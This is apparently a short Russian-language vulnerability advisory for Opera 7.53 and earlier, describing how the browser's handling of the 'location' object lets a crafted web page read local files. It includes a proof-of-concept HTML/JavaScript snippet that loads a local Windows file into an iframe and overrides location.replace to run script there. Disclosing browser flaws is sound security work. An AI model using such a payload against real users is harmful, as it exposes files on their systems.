Программа: Opera 7.53 и более ранние версии
Уязвимость обнаружена в Opera в обработке 'location' объекта. Удаленный пользователь может читать произвольные файлы на целевой системе пользователя.
Удаленный пользователь может сконструировать HTML, который, когда будет загружен целевым пользователем, прочитает файлы на целевой системе пользователе или запустит в контексте удаленного домена.
Пример:
<iframe></iframe>
<script type="text/javascript">
onload=function () {
var oVictim=frames[0];
oVictim.location.href="file://localhost/c:/winnt/help/ciadmin.htm";
oVictim.location.replace=function () {
oVictim.alert("We now have full file system access using
"+location.href);
}
</script>
